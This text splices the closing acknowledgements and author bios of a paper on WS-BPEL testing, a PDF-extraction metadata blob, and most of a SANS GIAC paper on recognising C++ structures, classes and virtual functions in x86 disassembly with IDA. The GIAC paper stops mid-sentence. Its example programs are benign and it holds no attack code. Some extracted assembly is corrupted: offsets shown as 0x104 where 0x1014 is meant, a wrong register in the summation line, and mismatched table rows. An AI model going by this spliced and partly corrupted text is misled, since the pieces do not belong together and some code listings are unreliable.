WS-BPEL, such adjustment and extension should not be a very difficult task and would be a promising research direction. ACKNOWLEDGEMENT We thank Yan Shang from University of Science and Technology Beijing for his help in the experiments reported in this paper, and Yunhui Zheng from Purdue University and Xiao He from University of Science and Technology Beijing for their helpful suggestions on constraint solvers. This research is supported by the National Natural Science Foundation of China under Grant No. 61370061, the Beijing Municipal Training Program for Excellent Talents under Grant No. 2012D00906000002, and the Fundamental Research Funds for the Central Universities under Grant No. FRF-SD-12-015A. REFERENCES Chang-ai Sun is a Professor in the School of Computer and Communication Engineering, University of Science and Technology Beijing. Before that, he was an Assistant Professor at Beijing Jiaotong University, China, a postdoctoral fellow at the Swinburne University of Technology, Australia, and a postdoctoral fellow at the University of Groningen, The Netherlands. He received the bachelor’s degree in Computer Science from the Beihang University, China. His research interests include software testing, program analysis, and Service-Oriented Computing. Yan Zhao is a master student in the School of Computer and Communication Engineering, University of Science and Technology Beijing. She received a bachelor degree in Computer Science from the same university. Her current research interests include software testing and Service-Oriented Computing. Lin Pan is a master student in the School of Computer and Communication Engineering, University of Science and Technology Beijing. He received a bachelor degree in Computer Science from the same university. Her current research interests include software testing and Service-Oriented Computing. Hual Liu is a Research Fellow at the Australia-India Research Centre for Automation Software Engineering, RMIT University, Australia. He received the BEng in physioelectronic technology and MEng in communications and information systems, both from Nankai University, China, and the PhD degree in software engineering from the Swinburne University of Technology, Australia. His current research interests include software testing, cloud computing, and end-user software engineering. Tsong Yueh Chen is a Professor of Software Engineering at the Department of Computer Science and Software Engineering in Swinburne University of Technology. He received his PhD in Computer Science from The University of Melbourne, the MSc and DIC from Imperial College of Science and Technology, and BSc and MPhil from The University of Hong Kong. His current research interests include software testing and debugging, software maintenance, and software design.
{"Source-Url": "http://vuir.vu.edu.au/33071/1/TSCpress.pdf", "len_cl100k_base": 11450, "olmocr-version": "0.1.49", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 48176, "total-output-tokens": 14563, "length": "2e13", "weborganizer": {"__label__adult": 0.0002713203430175781, "__label__art_design": 0.0003390312194824219, "__label__crime_law": 0.0002472400665283203, "__label__education_jobs": 0.0007152557373046875, "__label__entertainment": 6.0558319091796875e-05, "__label__fashion_beauty": 0.00013947486877441406, "__label__finance_business": 0.0001766681671142578, "__label__food_dining": 0.00024330615997314453, "__label__games": 0.0005202293395996094, "__label__hardware": 0.0006165504455566406, "__label__health": 0.00032258033752441406, "__label__history": 0.00020003318786621096, "__label__home_hobbies": 5.990266799926758e-05, "__label__industrial": 0.00025534629821777344, "__label__literature": 0.00023174285888671875, "__label__politics": 0.0001785755157470703, "__label__religion": 0.0003223419189453125, "__label__science_tech": 0.01499176025390625, "__label__social_life": 7.146596908569336e-05, "__label__software": 0.007350921630859375, "__label__software_dev": 0.97216796875, "__label__sports_fitness": 0.0002090930938720703, "__label__transportation": 0.0003304481506347656, "__label__travel": 0.00016379356384277344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 63138, 0.02804]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 63138, 0.56402]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 63138, 0.90496]], "google_gemma-3-12b-it_contains_pii": [[0, 4666, false], [4666, 11092, null], [11092, 16702, null], [16702, 21213, null], [21213, 23733, null], [23733, 29254, null], [29254, 33449, null], [33449, 39587, null], [39587, 41785, null], [41785, 43839, null], [43839, 45365, null], [45365, 52068, null], [52068, 59547, null], [59547, 63138, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4666, true], [4666, 11092, null], [11092, 16702, null], [16702, 21213, null], [21213, 23733, null], [23733, 29254, null], [29254, 33449, null], [33449, 39587, null], [39587, 41785, null], [41785, 43839, null], [43839, 45365, null], [45365, 52068, null], [52068, 59547, null], [59547, 63138, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 63138, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 63138, null]], "pdf_page_numbers": [[0, 4666, 1], [4666, 11092, 2], [11092, 16702, 3], [16702, 21213, 4], [21213, 23733, 5], [23733, 29254, 6], [29254, 33449, 7], [33449, 39587, 8], [39587, 41785, 9], [41785, 43839, 10], [43839, 45365, 11], [45365, 52068, 12], [52068, 59547, 13], [59547, 63138, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 63138, 0.03817]]}
olmocr_science_pdfs
2024-11-26
2024-11-26
4ed1c00902faa76dc2ba2a9deab4f343d68755ee
Fight crime. Unravel incidents... one byte at a time. Copyright SANS Institute Author Retains Full Rights Interested in learning more? Check out the list of upcoming events offering "Advanced Incident Response, Threat Hunting, and Digital Forensics (FOR508) x86 Representation of Object Oriented Programming Concepts for Reverse Engineers GIAC (GREM) Gold Certification Author: Jason Batchelor, jxbatchelor@gmail.com Advisor: Richard Carbone Accepted: November 23, 2015 Abstract Modern samples of malicious code often employ object oriented programming techniques in common languages like C++. Understanding the application of object oriented programming concepts, such as data structures, standard classes, polymorphic classes, and how they are represented in x86 assembly, is an essential skill for the reverse engineer to meet today's challenges. However, the additional flexibility object oriented concepts affords developers results in increasingly complex and unfamiliar binaries that are more difficult to understand for the uninitiated. Once proper understanding is applied, however, reversing C++ programs becomes less nebulous and understanding the flow of execution becomes more simplified. This paper presents three custom developed examples that demonstrate common object oriented paradigms seen in malicious code and performs an in-depth analysis of each. The objective is to provide insight into how C++ may be reverse engineered using the Interactive Disassembler software, more commonly known as IDA. 1. Introduction While object oriented programming is generally understood by developers using higher level languages, such as C++, the reverse engineer is required to understand how these concepts manifest themselves within a compiled binary. A reverse engineer operating on modern malware simply cannot afford to remain ignorant when considering data structures, standard classes, and polymorphic classes, as many of today’s specimens invoke one or more of the above. The remainder of this paper will review some core concepts involving how one derives context from variables identified in x86 disassembly and standard calling conventions. Subsequent sections will then focus specifically on the concepts of data structures, standard classes and polymorphic classes. A discussion on each of the criteria will be provided alongside case study analysis. During each case study, comparisons will be made between true source code and the x86 representation of a specific concept. While the provided source code serves to augment the discussion, the goal is to enable the reader to achieve the same results without its benefit. The exact compiler settings used for each of the provided case studies may be found in the Appendix. 1.1. Assumptions The examples discussed herein were written in C++ using Microsoft Visual Studio 2010 and compiled on a 32-bit Windows operating system using the Intel x86 architecture. The Interactive Disassembler (IDA) software will be used to identify attributes of general object oriented concepts and derive conclusions on how they are represented within the compiled binary. It is important to note, that all discussion within this paper will be directly tied to the above criteria. 1.2. Core Concepts The identification of structures, standard classes, and polymorphic classes within a binary file can be a complex task. By understanding how each of these concepts is represented at the lowest human-readable level of code, a key advantage is granted to the reverse engineer. This understanding can oftentimes be defined as a structure with different member elements in IDA. The structure can then be applied to the rest of the disassembled program. Doing so has far... reaching implications on the overall understanding of a program’s core capabilities, and how it functions at run time. Oftentimes, this has a domino effect on the overall reverse engineering effort and enriches the context a reverse engineer will be able to pass on to their customer. To achieve an understanding of structured elements, one needs to be well versed with traditional programming constructs, such as pointers and integers. Programming languages like C aid in this pursuit, because many C constructs correspond at a one to one ratio, to a single line of assembly (Lawlor, 2006). It is also important to understand how these types are used and represented in x86 assembly. The identification of data types relies on a solid understanding of assembly logic, which in itself contains the contextual clues necessary to inform the analysis. Table 1, below, provides a few examples of how the interpretation of basic assembly code can reveal deeper meaning. Consider the following examples in reference to the EAX register. <table> <thead> <tr> <th>Code</th> <th>Purpose</th> <th>EAX Context</th> </tr> </thead> <tbody> <tr> <td>lea eax, [edx+4]</td> <td>Add five to the address of [edx+4].</td> <td>Eax is likely a pointer to an integer or perhaps another pointer.</td> </tr> <tr> <td>add [eax], 5</td> <td></td> <td></td> </tr> <tr> <td>mov eax, [ecx+0xc]</td> <td>Call into the dereferenced value of [ecx+0xc].</td> <td>Eax is the address of a function.</td> </tr> <tr> <td>call eax</td> <td></td> <td></td> </tr> <tr> <td>mov eax, [ecx+0x4]</td> <td>Load address to structure at [ecx+0x4] and push its member offsets to the stack before calling a structure function.</td> <td>Eax is a pointer to a structure containing a pointer to a function and that functions member parameters.</td> </tr> <tr> <td>push [eax+0xc]</td> <td></td> <td></td> </tr> <tr> <td>push [eax+8]</td> <td></td> <td></td> </tr> <tr> <td>push [eax+4]</td> <td></td> <td></td> </tr> <tr> <td>call [eax]</td> <td></td> <td></td> </tr> </tbody> </table> Understanding calling conventions being used within the decompiled binary is also critical to deriving meaning from structured elements that are passed to member functions. Calling conventions are effectively a scheme, or standard, used for function callers (sub routine doing the call) and the callee (sub routine being called) within a program. They are primarily used for defining how parameters are passed to called functions and also how returned values are retrieved from them (Pollard, 2010). Four common types of calling conventions reverse engineers need to be concerned with when considering C++ programming for Windows are cdecl, stdcall,fastcall, and thiscall (Trifunovic, 2001). The cdecl convention is the default convention used by Microsoft for C and C++ programs (Microsoft, 2015). For this calling convention, arguments are passed from right to left and placed on the stack and cleanup of the stack is done by the caller (Trifunovic, 2001). integer or memory address values that are returned from the callee are saved to the EAX register for the caller (Jönsson, 2005). Figure 1 illustrates this concept with appropriate annotations. When considering API calls made using the Windows API, the stdcall convention is utilized. Stdcall arguments for this calling convention are pushed from the stack from right to left. In contrast to cdecl stack cleanup, stack maintenance responsibility is done by the function callee instead of the caller (Microsoft, 2015). Return values from functions are done so using the EAX register (Jönsson, 2005). The annotations in Figure 2 depict a common stdcall routine. Fastcall is a convention used to reduce the computational cost of calling a function. This is done primarily by taking the first two arguments of a function and placing them into the EDX and ECX registers. Remaining arguments are then placed on the stack from right to left. The process makes function calls less expensive because operations being done directly on register values are faster than on the stack (Trifunovic, 2001). Author Name, email@address The *thiscall* calling convention uses the callee to clean the stack and has function arguments pushed from right to left. With the Microsoft Visual C++ compiler the ‘this’ pointer is passed before a function is called; it is done so using the *ECX* register and not the stack (Microsoft, 2015). It is important to note the *thiscall* convention has a different implementation for the GCC compiler, where it is very similar to *cdecl* except the addition of the ‘this’ pointer, which is pushed onto the stack last (The Art Of Service, n.d.). For functions that do not have a variable number of arguments, *thiscall* is used by default as the calling convention (Trifunovic, 2001). *Thiscall* cannot be explicitly used, and is reserved for functions that do not specifically request a different convention, and do not take a variable number of arguments (HackCraft, n.d.). 2. Discussion of Object Oriented Concepts and Case Studies The following section focuses on three core concepts of object-oriented programming; data structures, standard classes, and polymorphic classes. Each concept discussed includes a brief review alongside a case study with emphasis on deriving context of member variables or functions. For each case study, the program is specifically written to demonstrate the topic being presented and deconstructed. 2.1. Data Structures A data structure is merely a group of variables tied together to a single name defining the group. The name represents a structure type that denotes the beginning of the structure and is usually passed around as a pointer in memory. As an example of this, we have the following defined structure in Figure 3. ```c 1. struct InternetConnection 2. { 3. HINTERNET Connect; 4. HINTERNET OpenAddress; 5. LPCTSTR Useragent; 6. LPCTSTR Uri; 7. char DataReceived[4096]; 8. DWORD NumberOfBytesRead; 9. DWORD TotalNumberRead; 10. }; ``` Figure 3: Example Structure Definition The structure type would be defined as *InternetConnection*, and members of this structure type include an assortment of handles, C String operators, character, and DWORD variables. Object names of type *InternetConnection*, may be declared in two primary ways. They may show up at the end of the structure type declaration before the final semicolon as seen in Figure 4. ```c struct InternetConnection { HINTERNET Connect; HINTERNET OpenAddress; LPCSTR Useragent; LPCSTR Url; char DataReceived[4096]; DWORD NumberOfBytesRead; DWORD TotalNumberRead; } nhlDotCom, sansDotCom; // object declarations ``` *Figure 4: Example Structure with Declared Objects* Alternatively, in Figure 5, they may also be instantiated separately within the code after the structure type has been declared. In this case, the structure type specifier is an optional attribute (CPlusPlus, n.d.). ```c InternetConnection nhlDotCom; InternetConnection sansDotCom; ``` *Figure 5: Alternate Instantiation of Objects* Incremental offsets to the start of the object are usually dereferenced in x86 to retrieve the member variable of a particular structure. To illustrate this concept from within a debugger, one can use OllyDbg while running a program that uses the structure type defined above. From the illustration in Figure 6, one can clearly see the address of 0x3FEA68 being used as the start address of our object ‘nhIDotCom.’ Dereferencing the start address would give one the HINTERNET Connect variable. These handle values take up one DWORD, or 4 bytes of memory as can be seen above. The LPCSTR values are pointers to their string types and likewise take one DWORD of space. These member values need to be dereferenced in order to be accessed for their contents. Conversely, the DataReceived variable is a character array with a maximum size of 4,096 bytes. These bytes can be clearly seen in the address space in the above screenshot. Finally, we have the last two DWORD values representing the number of bytes read. and the total number of bytes read. It is important to remember endianness when interpreting these and all byte values on the heap. The final value for `TotalNumberRead`, while appearing visually to be that of `0xc6620100`, is actually `0x0162c6` (90,822 bytes) after endianness is considered. At this point, a structure of type `InternetConnection` has been declared along with its member values. Analysis was then performed on how a structure like this would be visually represented in memory of a program making use of this structure. At the assembly level, to reference members of an `InternetConnection` object, we need to first pay special attention to the size of each variable, and understand how much space it will take up on the heap. Doing so will allow us to accurately compute the offset, relative to the start of the `InternetConnection` object. Table 2 below represents how members of `InternetConnection` objects would be accessed in x86 assembly assuming the register `ESI` is the address of our `InternetConnection` object. <table> <thead> <tr> <th>X86 Instruction</th> <th>InternetConnection Member</th> </tr> </thead> <tbody> <tr> <td>[esi]</td> <td>HINTERNET Connect</td> </tr> <tr> <td>[esi+4]</td> <td>HINTERNET OpenAddress</td> </tr> <tr> <td>[esi+8]</td> <td>LPCTSTR UserAgent</td> </tr> <tr> <td>[esi+0xc]</td> <td>LPCSTR Uri</td> </tr> <tr> <td>[esi+0x10]</td> <td>Char DataReceived[4096]</td> </tr> <tr> <td>[esi+0x1010]</td> <td>DWORD NumberOfBytesRead</td> </tr> <tr> <td>[esi+0x1014]</td> <td>DWORD TotalNumberRead</td> </tr> </tbody> </table> ### 2.1.1. Structures in IDA The IDA software enables analysts to create custom structures and incorporate them into the disassembled program. Using IDA Pro, one would complete the following steps in order to represent the structure type of `InternetConnection` and its members. 1. Select the structures tab and press the insert key. 2. Name the structure `InternetConnection`. 3. Use the ‘d’ data key after highlighting one’s new structure to create member variables. a. One may continuously press the ‘d’ key to adjust the size to either a BYTE, WORD, or DWORD. b. Special sizes need to be specified by right clicking a BYTE sized representation of the member variable, selecting array, then typing the size. 4. Rename the structure and its members using the ‘n’ key as one would any variable or subroutine from within IDA (Eagle, 2011). After completing the steps above, one should have something similar to that depicted in Figure 7. ``` InternetConnection struc ; (size=0x1018) Connect dd ? OpenAddress dd ? UserAgent dd ? Uri dd ? DataReceived db 4096 dup(?) NumberOfBytesRead dd ? TotalNumberOfRead dd ? InternetConnection ends ``` Figure 7: Completed IDA Structure To apply the above structure to an object member of the matching type within IDA, right click on the member in IDA, scroll to structure offset, and select the matching structure type. The illustration below shows the application of the UserAgent and Uri structure members to a decompiled program that uses the InternetConnection structure type. ``` mov ecx, [ebp+InternetConnection_Object_1] mov [ecx+InternetConnection.UserAgent], offset aMozilla5_0Wind ; "Mozilla/5.0 (Window mov edx, [ebp+InternetConnection_Object_1] mov [edx+InternetConnection.Uri], offset aHttpWWW_nhl_co ; "http://www.nhl.com" ``` Figure 8: Application of Structure in IDA 2.1.2. Case Study #1 – InternetConnection Structure Type To further demonstrate the concept of data structures as they are encountered at the assembly level, a case study has been compiled that used an InternetConnection object. The object is used as part of a program that reaches out to a remote server over an HTTP connection and computes the total number of bytes served up as a webpage to the client. Each member variable of our structure is used as a part of this process, and the decompiled x86 code generated from IDA will be cross referenced with the higher level source code. Author Name, email@address In Figure 9, the InternetConnection object is first instantiated and then passed as a variable to the GetHTML function, which itself returns the number of bytes returned to our printf statement. ```c 1. int main() 2. { 3. InternetConnection conn; // object instantiation 4. printf("Total downloaded %d bytes \n", GetHTML(conn)); // passing to GetHTML 5. return 0; 6. } ``` Figure 9: Case Study Main Function Conversely, the passing of the conn object is done with IDA, given the following code in Figure 10. ``` lea eax, [ebp+var_1020] push eax call f_GetHTML ``` Figure 10: Passing of Conn Object in x86 Reviewing the above x86 code, at first glance, one would have no reason to believe that var_1020 is an object pointer to our structure. A closer look is now needed at how this is used from within the f_GetHTML function. Our first major hint is found as various structure elements are initialized. ``` mov eax, [ebp+arg_0] mov dword ptr [eax+1014h], 0 ``` Figure 11: Initialization of Structure Member The illustration in Figure 11 depicts a variable at the 0x1014 offset from the start of the object being set to zero. In the first line, arg_0 represents the start address of our object in memory and is passed to EAX. The register is then used as a reference point to set member values. At this point, one can begin to infer that arg_0 is a pointer to an object whose type and members are presently unknown. As we continue to work our way forwards, however, some of the relationships become obvious as plaintext strings are initially set to some of the structure members. ```c int GetHTML(InternetConnection &conn) { conn.TotalNumberRead = 0; conn.Useragent = "Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0" "; conn.Uri = "http://www.nhl.com"; conn.Connect = InternetOpen(conn.Useragent,INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0); } ``` From Figure 12, `arg_0` is passed to various register values, which ultimately serves as the starting point for our object. By reviewing the code depicted above, two strings representing a user agent and a URI are set to their respective offsets. Further validation for the user agent variable is given once one sees it pushed to the stack before the call to the API `InternetOpen`. After the call to `InternetOpenA` is made, one can see the returned `HINTERNET` handle stored in another member offset of our structure type. The source code at this point has a very similar flow of execution. When another API call in the program is made to `InternetOpenUrlA`, one gets more validation concerning the `URI` string that was initialized earlier. In addition, one is able to actualize one more member of our structure using the offset `[edx+4]`. The member variable is seen storing the `HINTERNET` handle for this call shortly after it is made in Figure 13. Author Name, email@address It is worth noting at this point that for the user agent and URI variables seen initialized earlier in the disassembly, it was not immediately assumed the variables were used as such until it became clear in the code. Doing so would be a novice mistake, as malicious code authors often purposefully initialize variables to something seemingly benign as a simple means to obfuscate its true intent. It is therefore essential that the reverse engineer lets the code do the talking, and lets the true meaning of each variable reveal itself in how it is utilized. Once a call is made to InternetReadFile, one can gain two more definitions for the InternetConnection structure type. However, the way the compiler represents the structure offsets is somewhat different than what was have previously observed. Instead of seeing the object offset referenced in open and close braces, one sees the beginning of the object moved to the register, then an add operation done immediately followed by a push to the API function InternetReadFile. The behavior can be observed on lines 1-3 and 5-7 of Figure 14 below. Figure 13: Accessing Structure Members Before WinAPI Call The usage alongside the API call `InternetReadFile` also gives contextual insight into how they fit into the `InternetConnection` structure. The first example can be correlated back to the `lpdwNumberOfBytesRead`, and the second can be tied directly back to the `lpBuffer` variable. Through MSDN, one can infer what these variables are used for, as well as how much space they take up within our structure. For example, one would know that `lpBuffer` is going to be populated with 0x1000 (4,096) bytes each time based on the `dwNumberOfBytesToRead` attribute. The final structure member’s usage becomes clear after the call to `InternetReadFile` is made. The x86 code enters a small block that seems to compute a summation based on the `InternetConnection` member attribute `NumberOfBytesRead`. The annotated x86 representation in Figure 15 illustrates this concept. The structure member ‘`NumberOfBytesRead`’ is applied on the fourth line since previously achieved understanding of that value was done in Figure 14. Doing so assists in deriving meaning for what is ultimately the `TotalNumberRead` structure member. ``` mov eax, [ebp+arg_0] ; pass object pointer to eax mov ecx, [eax+104h] ; retrieve value at 0x1014 offset mov edx, [ebp+arg_0] ; pass object pointer to edx add ecx, [edx+InternetConnection.NumberOfBytesRead] add ecx, [ecx+0x104h] ; store summation result at 0x1014 offset jmp short loc_401081 ``` Figure 14: Contextual Insight into Structure Member Role Figure 15: Annotated Usage of Structure Member 2.2. Standard Classes Classes themselves are merely an expanded concept of data structures. The primary difference between them and a normal data structure is they can contain functions as well as member variables (CPlusPlus, n.d.). Compiled code that uses classes can sometimes lose the ‘class’ identity if the compiler has better ideas on how the code can be interpreted. This is true for all written code, as all code that is written is open to interpretation by the compiler and is often put through a gauntlet of optimizations. The provided case study examines this phenomenon as it applies to standard classes in greater detail. 2.2.1. Case Study #2 – Square Class to Calculate Area In order to demonstrate how classes may be represented at the assembly level, a sample proof of concept program was created using a class named ‘Square.’ The class contains two variables and two functions that utilize them. The program simply initializes an object of type Square, computes the area, then exits after printing. Source code of the Square class is illustrated in Figure 16. ```cpp #include <iostream> using namespace std; class Square { int width, height; public: void set_values(int x, int y) { width = x; height = y; } int area() {return width*height;} }; void Square::set_values (int x, int y) { width = x; height = y; } Figure 16: Source Code of Square Class ``` When the a *Square* object is declared, the memory contents that represent the object will not represent what one might consider to be a *Square* object when looking at the source code. In fact, when reviewing the memory contents of what should be the Square object, one is met with only two variables after it is initialized, both of which are depicted in Figure 17 as 4-byte width and height values. ![Figure 17: Heap of Square Object](image) So, where are the additional function pointers to the ‘set_values’ and ‘area’ subroutines? The compiler, in this case, chose not to use them that way. Compiler settings and their underlying logic can change the execution flow of a program dramatically. Adjusting for size or speed can greatly impact how defined classes are interpreted, and ultimately will change how a decompiled program is logically represented versus the original source code. This has an amplifying effect when considering byte-code based signatures for detecting malware and is a simplistic evasion technique employed by malware authors. While the intricacies of compiler theory are far beyond the scope of this paper, it is nonetheless worth mentioning. Considering the compiler’s intentions, and the resulting disassembled code, it is fair to say the ‘class’ is treated like a ‘structure’ in so far as the structure used as an example does not contain any void pointers to class functions. The class functions used by *Square* are called as if they are separate elements in Figure 18. Further exploration of each of these functions is necessary to understand the purpose of the two member variables in absence of original source code. Author Name, email@address When the object is defined a call to its set values method is made. Outside in the main function, the two bits of code seem to be very similar; however, within the x86 example one sees the address of a variable being loaded into the ECX register which demonstrates the thiscall convention. Observing this behavior also implies this object may be a global in scope (Sabanal & Yason, 2007). Without the benefit of source code, it should be clear to a user that the function being traced into takes two arguments and will likely make use of the ‘this’ pointer, contained in ECX at some point. ``` sub_401020 proc near var_4= dword ptr -4 arg_0= dword ptr 8 arg_4= dword ptr 0Ch push ebp mov ebp, esp push ecx mov [ebp+var_4], ecx ; pointer to object mov eax, [ebp+var_4] ; eax = object pointer mov ecx, [ebp+arg_0] ; arg0, previously pushed int type mov [eax], ecx ; set integer to dereferenced object field mov edx, [ebp+var_4] ; pointer to object mov eax, [ebp+arg_4] ; arg4, previously pushed int type mov [edx+4], eax ; set integer to dereferenced object field mov esp, ebp pop ebp ret 8 sub_401020 endp ``` When tracing into the `sub_401020` function from Figure 19, the two integer functions are set within the passed object at a predefined offset. The ‘this’ pointer is moved into `EAX` and `EDX` from `var_4` below, after it is filled with `ECX`, which was the initial object pointer from earlier, set from the function caller. Both `EAX` and `EDX` are dereferenced in order to populate the object with its member values. At this point, it should be clear that the main purpose of this subroutine is to initialize this object. When tracing back to the original function caller in Figure 20, one sees the this pointer passed again to `ECX`. Before stepping into `sub_401000`, it takes zero arguments but likely does something with the previously initialized object. While these inferences inform analysis and gauge expectations, letting the code tell the real story is extremely important. ![Figure 20: Stepping into Function Using Object](image) ```assembly lea ecx, [ebp+var_8] ; pointer to our object call sub_401000 ``` Figure 20: Stepping into Function Using Object Upon stepping into this function one can clearly see it load the this pointer from the `ECX` register into a local function variable. From there, the same pointer is used to populate the `EAX` and `ECX` register. The move from `var_4` to `ECX` is redundant, and it should be noted here the example assembly was compiled using no optimizations to help better illustrate what is going on. ![Figure 21: Computation Performed Using Structure Members](image) ```assembly sub_401000 proc near var_4= dword ptr -4 push ebp mov ebp, esp push ecx mov [ebp+var_4], ecx ; pointer to object moved from ecx mov eax, [ebp+var_4] ; pointer moved to eax mov ecx, [ebp+var_4] ; pointer moved back to ecx mov eax, [eax] ; eax dereferenced and stored imul eax, [ecx+4] ; eax is multiplied with dereferenced object integer mov esp, ebp pop ebp ret sub_401000 endp ``` Figure 21: Computation Performed Using Structure Members The object pointers are both dereferenced and used in a multiplication operation to retrieve the calculated area in Figure 21. Even if one did not have the benefit of knowing from previous analysis what the member value types of the object were, observing the `imul` (integer multiplication) operation would be enough to tell us they are integers. The result is stored in `EAX` and when the function returns that value it is pushed to the `printf` API in order to display the result to the end user. ``` push eax push offset aAreaD ; "Area: %d" call ds:printf ``` Figure 22: Final Print of Previously Computed Result ### 2.3. Polymorphic Classes The concept of polymorphism is a powerful way to extend a class from its base and still be type compatible. Concepts, such as class inheritance, are fundamental to polymorphism because the derived classes inherit their base member attributes. In this way, a derived class can leverage base class attributes in their own internal functions (CPlusPlus, n.d.). Virtual functions are a related concept to polymorphic classes, in that they are used to extend functions to derived classes in a similar fashion to how base member variables are. Calls to virtual functions are done dynamically, and therefore use of the ‘this’ pointer is expected (Skochinsky, 2011). The case study presented in the next section goes over this concept and how it may be encountered at the assembly level. #### 2.3.1. Case Study #3 – Finding the Magic Numbers For Each Shape The compiled case study presents three different shapes with the base class called ‘Polygon’. This base class has two derived member classes called ‘Triangle’ and ‘Rectangle’ which share the base class attributes ‘width’ and ‘height.’ They also inherit a virtual function called ‘magic,’ which simply returns a computed integer based on the inherited member variables and its invocation. What makes these derived classes polymorphic is the fact that they are inheriting a virtual function (CPlusPlus, n.d.). Figure 23 shows a depiction of the source code for this program with the three classes discussed. ``` 1. class Polygon { 2. protected: 3. int width, height; 4. public: 5. void set_values(int a, int b) 6. { width=a; height=b; } 7. virtual int magic() 8. { return width + height; } 9. }; 10. 11. class Rectangle: public Polygon { 12. public: 13. int magic() 14. { return width * height; } 15. }; 16. 17. class Triangle: public Polygon { 18. public: 19. int magic() 20. { return (width - height); } 21. }; ``` Figure 23: C++ Code Defining Three Classes Within the main component of the program, we initialize three variables; rect, trgl, and poly respectively, and then for each of them define three more variables that are pointers to Polygon and assigned the addresses of a derived class (CPlusPlus, n.d.). The assignments and initializations are depicted in Figure 24. ``` 1. int main () { 2. Rectangle rect; 3. Triangle trgl; 4. Polygon poly; 5. Polygon * rectangle = &rect 6. Polygon * triangle = &trgl; 7. Polygon * polygon = &poly; 8. rectangle->set_values (10,6); 9. triangle->set_values (7,5); 10. polygon -set_values (4,5); ``` Figure 24: Assignments Made to Base and Derived Classes At the assembly level, one can cross reference each setup and initialization of our objects with the different respective subroutines. Figure 25 demonstrates the three pointers to \textit{Polygon} as they are being setup. Note once again, we see the address being loaded into the \textit{ECX} register, falling in line with the \textit{thiscall} convention. \begin{verbatim} lea ecx, [ebp+var_20] ; load address of variable call sub_401130 ; sub to define attributes of object lea ecx, [ebp+var_C] call sub_401150 lea ecx, [ebp+var_30] call sub_401170 \end{verbatim} \textbf{Figure 25: x86 Initialization of Classes} By tracing into the top most subroutine, it can clearly be seen that the function override takes place for the derived class in Figure 26. \begin{verbatim} f_initialize_derived_class_1 proc near ptr_object= dword ptr -4 push ebp mov ebp, esp push ecx mov [ebp+ptr_object], ecx mov ecx, [ebp+ptr_object] ; pointer to object call f_initialize_base_class ; must define base class mov eax, [ebp+ptr_object] pointer to new address is overridden with offset to new function mov dword ptr [eax], offset off_40215C ; derived classes virtual function mov eax, [ebp+ptr_object] mov esp, ebp pop ebp retn f_initialize_derived_class_1 endp \end{verbatim} \textbf{Figure 26: Initialization of Derived Class} Within this subroutine two main things happen. First, the pointer to the derived class object is stored in \textit{ECX}, and a subroutine is called which defines the base class. Next, that same object is loaded, and the address is overridden to point to a new offset, the address of the derived classes virtual function. Without the benefit of source code one can still make this assumption. because upon stepping into the function `f_initialize_base_class`, one sees very much the same behavior as compared to the caller. ``` .f_initialize_base_class proc near ptr_object= dword ptr -4 push ebp mov ebp, esp push ecx mov [ebp+ptr_object], ecx mov eax, [ebp+ptr_object]; move address of object to eax derference eax and set to virtual function offset mov dword ptr [eax], offset off_402154 mov eax, [ebp+ptr_object] mov esp, ebp pop ebp ret f_initialize_base_class endp ``` Figure 27: Setup for Base Class Object As seen in Figure 27, the object pointer is again loaded, and dereferenced itself to store the offset to a virtual function at the virtual memory address of 0x402154. However, once this function has completed, the same address from [eax] is loaded and dereferenced again to point to a new virtual function address in Figure 26. The base class definition in Figure 27 is overridden, and instead is the derived classes virtual function at `off_40215C`. In Figure 28, we take this knowledge combined with our applied annotations and function names thus far, and go back to IDA where the objects were being initialized. It should be now obvious which of the subroutines initializes our Polygon base class and which two are derived. ``` lea ecx, [ebp+var_20]; load address of variable call f_initialize Derived class_1; sub to define attributes of object lea ecx, [ebp+var_2C] call f_initialize Derived class_2 lea ecx, [ebp+var_30] call f_initialize base class ``` Figure 28: Applying Definition of Class Types Continuing onward through the flow of execution in Figure 29, next is the three separate calls to the `set_values` function. At the x86 level this is called in a very similar fashion to how it is observed in the original source code. <table> <thead> <tr> <th>X86 Disassembly</th> </tr> </thead> <tbody> <tr> <td>push 6</td> </tr> <tr> <td>push 10</td> </tr> <tr> <td>mov ecx, [ebp+var_14]</td> </tr> <tr> <td>call sub_401000</td> </tr> <tr> <td>push 5</td> </tr> <tr> <td>mov ecx, [ebp+var_10]</td> </tr> <tr> <td>call sub_401000</td> </tr> <tr> <td>push 7</td> </tr> <tr> <td>mov ecx, [ebp+var_24]</td> </tr> <tr> <td>call sub_401000</td> </tr> </tbody> </table> <table> <thead> <tr> <th>C++ Source Code</th> </tr> </thead> <tbody> <tr> <td>1. rectangle-&gt;set_values (10,6);</td> </tr> <tr> <td>2. triangle-&gt;set_values (7,5);</td> </tr> <tr> <td>3. polygon-&gt;set_values (4,5);</td> </tr> </tbody> </table> **Figure 29: Comparative Analysis of Code When set_values is Called** Within the subroutine depicted above, one can start to build a structure depiction based on the base class. The figure below contains annotations depicting this in greater detail. It is important to note specifically that earlier, the starting offset for our structure was defined when our object was being initialized, 